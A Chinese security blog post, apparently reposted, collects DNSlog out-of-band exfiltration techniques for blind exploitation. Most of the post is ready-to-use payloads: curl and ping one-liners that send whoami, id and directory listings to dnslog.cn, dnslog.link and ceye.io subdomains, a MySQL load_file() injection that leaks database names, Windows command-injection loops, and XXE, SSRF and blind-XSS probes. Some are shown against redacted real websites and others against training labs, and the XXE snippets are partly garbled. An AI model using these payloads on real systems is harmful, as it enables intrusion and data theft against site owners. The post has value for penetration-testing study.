dnslog平台+漏洞盲打合集

VSole2021-07-23 07:51:38

dnslog盲打

平台分析:

dnslog.link,命令执行漏洞的时候搞起ls命令记录起来很利索,比dnslog.cn快

http://admin.dnslog.link

ping 456.test.dnslog.link


判断:

https://admin.dnslog.link/api/dns/test/456/

缺点:登陆会暴露记录,虽然可以点击clear,单也不保证别人没存

windows与linux攻击技巧:

linux:link:curl http://123.test.dnslog.link/`whoami` ping -c 1 `whoami`.123.test.dnslog.linkcn: 5ek72t.dnslog.cncurl http://5axzi7.dnslog.cn/`whoami` ping -c 1 `whoami`.5ek72t.dnslog.cn

如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; 

curl http://test.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚本;

for i in $(ls /);do curl "http://$i.123.test.dnslog.link/";done; windows:for i in $(ls /);do curl "http://$i.5ek72t.dnslog.cn/";done; windows:5ek72t.dnslog.cn

windows:

利用HTTP请求:

for /F %x in ('whoami') do start http://test.dnslog.link/%x

将结果使用默认浏览器弹出;利用DNS请求:获取计算机名:

for /F "delims=/" %i in ('whoami') do ping -n 1 %i.test.dnslog.link

获取用户名:

for /F "delims=/ tokens=2" %i in ('whoami') do ping -n 1 %i.test.dnslog.link

不能编码输出,但利用powershell可以实现;dir有/b参数,不显示修改日期等信息,只显示文件名,所以可以弹出;

for /F %x in ('dir /b C:/') do start http://test.dnslog.link/[%x].jpg

某站ping工具命令执行漏洞:dnslog验证:


三大免费dns解析记录网站介绍

http://www.dnslog.cn

http://admin.dnslog.link 账号密码:test/123456

http://ceye.io

DNSLOG回显Demo

这样说原理很抽象,下面通过实际例子看下。有时候http://ceye.io访问太慢,推荐使用http://www.dnslog.cn平台或者t00ls的DNSLOG平台。下面以http://ceye.io 为例子。

http://ceye.io 这是一个免费的记录dnslog的平台,我们注册后到控制面板会给你一个二级域名:xxx.ceye.io,当我们把注入信息放到三级域名那里,后台的日志会记录下来。



sql盲注

不论是布尔型盲注还是时间型盲注,都需要频繁的跑请求才能够获取数据库中的值,在现代 WAF 的防护下,很可能导致 IP 被 ban。我们可以结合 DNSlog 完美快速的将数据取出。如遇到 MySql 的盲注时,可以利用内置函数 load_file() 来完成 DNSlog,load_file()不仅能够加载本地文件,同时也能对URL发起请求。

payload :1' and load_file(concat('\\\\',(select database()),'.123.test.dnslog.link\\abc'))--+http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select database()),'.52i39v.ceye.io\\abc'))--+



RCE的盲打

操作系统

盲注方式

windows

%variable%

linux

variable 反引号

此处使用公网一个 DVWA 靶场( Windows 系统搭建)为例进行演示,Payload:

%WINDIR%.52i39v.ceye.io

,如下所示:


如果是 Linux 环境,则 Payload 对应的应该为:

ping `whoami`.u4f95y.dnslog.cn

Windows 常用变量:

//变量 类型 描述

//%ALLUSERSPROFILE% 本地 返回“所有用户”配置文件的位置。

//%APPDATA% 本地 返回默认情况下应用程序存储数据的位置。

//%CD% 本地 返回当前目录字符串。

//%CMDCMDLINE% 本地 返回用来启动当前的 Cmd.exe 的准确命令行。

//%CMDEXTVERSION% 系统 返回当前的“命令处理程序扩展”的版本号。

//%COMPUTERNAME% 系统 返回计算机的名称。

//%COMSPEC% 系统 返回命令行解释器可执行程序的准确路径。

//%DATE% 系统 返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息,请参阅 Date。

//%ERRORLEVEL% 系统 返回上一条命令的错误代码。通常用非零值表示错误。

//%HOMEDRIVE% 系统 返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

//%HOMEPATH% 系统 返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

//%HOMESHARE% 系统 返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。

//%LOGONSERVER% 本地 返回验证当前登录会话的域控制器的名称。

//%NUMBER_OF_PROCESSORS% 系统 指定安装在计算机上的处理器的数目。

//%OS% 系统 返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。

//%PATH% 系统 指定可执行文件的搜索路径。

//%PATHEXT% 系统 返回操作系统认为可执行的文件扩展名的列表。

//%PROCESSOR_ARCHITECTURE% 系统 返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。

//%PROCESSOR_IDENTFIER% 系统 返回处理器说明。

//%PROCESSOR_LEVEL% 系统 返回计算机上安装的处理器的型号。

//%PROCESSOR_REVISION% 系统 返回处理器的版本号。

//%PROMPT% 本地 返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。

//%RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。

//%SYSTEMDRIVE% 系统 返回包含 Windows server operating system 根目录(即系统根目录)的驱动器。

//%SYSTEMROOT% 系统 返回 Windows server operating system 根目录的位置。

//%TEMP%和%TMP% 系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。

//%TIME% 系统 返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息,请参阅 Time。

//%USERDOMAIN% 本地 返回包含用户帐户的域的名称。

//%USERNAME% 本地 返回当前登录的用户的名称。

//%USERPROFILE% 本地 返回当前用户的配置文件的位置。

//%WINDIR% 系统 返回操作系统目录的位置。

XXE的盲打

进入靶场实践

]><name>&hacker;name>


构造读取本地文件的 Payload:

 ]><foo>&xxe;foo>

假设这是一个 XXE 无回显的漏洞,或者说不清楚服务器是什么操作系统、不清楚文件组成,可以构造如下 DNSlog 相关的 Payload:

 ]><foo>&xxe;foo>


ssrf-dnslog+实战案例

一、某翻译-dnslog

http://xxxx.xxx.com/webTransPc/index.html?from=zh-CHS&to=en&type=1&url=http://os1gxn.dnslog.cn



可以看到 DNSlog 平台成功记录访问请求,证明存在 SSRF 漏洞:

http://127.0.0.1/pikachu/vul/ssrf/ssrf_fgc.php?file=http://4zq94q.dnslog.cn/

刷新 DNSlog 服务器的记录,发现靶场发起的访问请求记录:

http://www.dnslog.cn/

XSS的盲打+实战

在实战中能真正能构成致命性损伤的 XSS 类型就是储存型 XSS

有时在留言板提交的申请是不能回显在前台而是插入了后台页面或者数据库这时我们就要用盲打dnslog验证后台xss是否会触发

os1gxn.dnslog.cn


某外国网址xss的url请求

http://www.xxx.cn/about.php?id=%3Cscript%20src=http://os1gxn.dnslog.cn%3E%3C/script%3E



payload盲打
本作品采用《CC 协议》,转载必须注明作者和本文链接
ezXSS介绍ezXSS是一款用于渗透测试和漏洞挖掘的XSS盲测跨站脚本工具。在演示版本中可能禁用了一些特性。
dnslog.link,命令执行漏洞的时候搞起ls命令记录起来很利索,比dnslog.cn快
大家好,在本文中,我将分享我在2个TikTok资产发现的XSS漏洞。当我决定在TikTok 程序中寻找漏洞 时,我花了1个月的时间寻找这个XSS。当我在TikTok 卖家账户上创建产品时,这个 XSS 发现开始了我在卖家账户的产品名称中插入了 XSS payload
DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件?以Mysql为例,通过dnslog外带数据需要用到load_file函数,所以一般得是root权限,并且secure_file_priv得为空payload:。1' and # //查看当前用户。返回用来启动当前的 Cmd.exe 的准确命令行。通常用非零值表示错误。
DNSLog 盲注总结
2022-05-07 06:52:34
众所周知,我们输入的域名需要通过DNS服务器进行解析得到IP地址才能通过IP访问网站,DNSLog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问的信息,类似日志文件。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。
笔者继续带大家炒Fastjson的冷饭。关于漏洞分析和利用链分析文章网上已有大量,但是关于如何自动化检测的文章还是比较少见的,尤其是如何不使用Java对Fastjson做检测。
尝试扫了一下,虽然发送了很多payload,但没有发现任何漏洞。最后通过自己努力和改造,终于挖到了XSS漏洞。XSS是web安全中最为常见的漏洞,XSS全称是Cross Site Script。XSS攻击通常指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,
无回显概念无回显,即执行的payload在站点没有输出,无法进行进一步操作。不同漏洞的无回显1、SQL注入无回显SQL注入,作为OWASP常年占据榜首位置的漏洞,在无回显中也是常见的。
前言在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把想获得的数据外带出来。DNS 的全称是 Domain Name System,它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如 www.baidu.com,网络上的 DNS Server 会将该域名解析,并找到对应的真实 IP 如 127.0.0.1,使用户可以访问这台服务器上相应的服务。了解到了什么是 DNS,那么什么又是 DNSlog 呢?
VSole
网络安全专家